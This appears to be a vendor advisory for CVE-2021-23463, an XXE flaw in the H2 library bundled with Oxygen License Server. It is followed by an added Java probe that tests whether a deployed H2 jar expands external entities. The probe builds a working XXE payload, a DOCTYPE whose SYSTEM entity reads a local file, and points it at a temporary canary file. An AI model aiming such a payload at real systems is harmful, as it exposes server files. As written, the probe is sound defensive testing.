CVE-2021-23463 - XML External Entity (XXE) Injection
Severity: Low
2022-02-08
Abstract
The package com.h2database:h2 from version 1.4.198 and before 2.0.202 is vulnerable to XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML object returned by the org.h2.jdbc.JdbcResultSet.getSQLXML() method. Calling that object's getSource() method with DOMSource.class as the parameter parses the stored XML with external entity resolution enabled, which triggers the vulnerability.
The Oxygen License Server product incorporates com.h2database:h2 as a third-party library. This advisory was opened to address the potential impact of this third-party library vulnerability.
Affected Products/Versions
Product | Severity | Fixed Release Availability
Oxygen License Server v24.0 and older | Low | Oxygen License Server 24.0 build 2022020113
Detail
CVE-2021-23463
Severity: Critical
CVSS Score: 9.1
The com.h2database:h2 third-party library used by Oxygen XML products is one of the affected versions listed in the CVE-2021-23463 vulnerability description. However, the products do not use this library to parse XML data from untrusted sources, so the trigger described above (JdbcResultSet.getSQLXML() followed by getSource(DOMSource.class)) does not operate on attacker-supplied content. For that reason, we have rated the severity level for our products as low.
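The following Java program is an added example; it is not code from this advisory, from Syncro Soft, or from the H2 project. It exercises the trigger path named in the abstract (JdbcResultSet.getSQLXML() followed by JdbcSQLXML.getSource(DOMSource.class)) against a private in-memory H2 database, using a constructed document whose external entity points at a temporary canary file the probe writes itself, and reports whether the canary text reaches the DOM. It then parses the same document with a DocumentBuilderFactory carrying the usual XXE mitigations (DOCTYPE disallowed, external entities and external DTD loading off); that is the generic hardening, not a copy of the upstream 2.0.202 fix. The class and method names (H2XxeProbe, roundTripThroughH2, parseHardened), the table name docs and the canary string are assumptions. It needs the h2 jar on the classpath and should only be run against a throwaway local instance.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.SQLXML;
import java.sql.Statement;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.transform.dom.DOMSource;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

/**
 * Added probe (not Oxygen or H2 code): checks whether the h2 jar on the classpath
 * expands external entities on the JdbcResultSet.getSQLXML() -> getSource(DOMSource.class) path.
 * Uses only a private in-memory database and a temp file it creates itself.
 */
public class H2XxeProbe {

    // Constructed canary text; the probe only reads back a temp file it wrote itself.
    static final String CANARY = "h2-xxe-canary-0xC0FFEE";

    /** Constructed test document: an external general entity pointing at the canary file. */
    static String payload(Path canaryFile) {
        return "<?xml version=\"1.0\"?>\n"
             + "<!DOCTYPE doc [<!ENTITY ext SYSTEM \"" + canaryFile.toUri() + "\">]>\n"
             + "<doc>&ext;</doc>";
    }

    /**
     * Stores xml as a CLOB (hypothetical table "docs"), reads it back through
     * getSQLXML()/getSource(DOMSource.class) and returns the root element's text.
     * A driver that rejects the DOCTYPE surfaces the parser error as an SQLException.
     */
    static String roundTripThroughH2(String xml) throws SQLException {
        try (Connection c = DriverManager.getConnection("jdbc:h2:mem:")) {
            System.out.println("H2 driver version: " + c.getMetaData().getDriverVersion());
            try (Statement s = c.createStatement()) {
                s.execute("CREATE TABLE docs(id INT PRIMARY KEY, body CLOB)");
            }
            try (PreparedStatement ps = c.prepareStatement("INSERT INTO docs VALUES (1, ?)")) {
                ps.setCharacterStream(1, new StringReader(xml));
                ps.executeUpdate();
            }
            try (Statement s = c.createStatement();
                 ResultSet rs = s.executeQuery("SELECT body FROM docs WHERE id = 1")) {
                rs.next();
                SQLXML sqlxml = rs.getSQLXML(1);                    // org.h2.jdbc.JdbcSQLXML
                DOMSource src = sqlxml.getSource(DOMSource.class);  // the path named in the CVE
                Document doc = (Document) src.getNode();
                return doc.getDocumentElement().getTextContent();
            }
        }
    }

    /**
     * Reference parse of the same document with the usual XXE mitigations.
     * Generic hardening for comparison, not a copy of the upstream fix.
     */
    static String parseHardened(String xml) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        Document doc = dbf.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        Path canary = Files.createTempFile("h2-xxe-", ".txt");
        Files.write(canary, CANARY.getBytes(StandardCharsets.UTF_8));
        String xml = payload(canary);
        try {
            String text = roundTripThroughH2(xml);
            if (text.contains(CANARY)) {
                System.out.println("VULNERABLE: entity expanded, file content reached the DOM");
            } else {
                System.out.println("Entity not expanded; DOM text was \"" + text + "\"");
            }
        } catch (SQLException e) {
            // Fixed drivers reject the DOCTYPE and report it here; read the message to be sure
            System.out.println("getSource() did not return a DOM: " + e.getMessage());
        }
        try {
            parseHardened(xml);
            System.out.println("Hardened parser unexpectedly accepted the DOCTYPE");
        } catch (SAXParseException e) {
            System.out.println("Hardened parser rejected the DOCTYPE as expected: " + e.getMessage());
        } finally {
            Files.deleteIfExists(canary);
        }
    }
}
```

Run it once with the h2 jar bundled in the deployed product and once after upgrading to 2.0.202 or later; the first line printed is the driver version reported by JDBC metadata, which is the quickest confirmation that the upgrade actually took effect. The probe only covers the DOMSource path named in the CVE, so a clean result for other Source types should not be inferred from it.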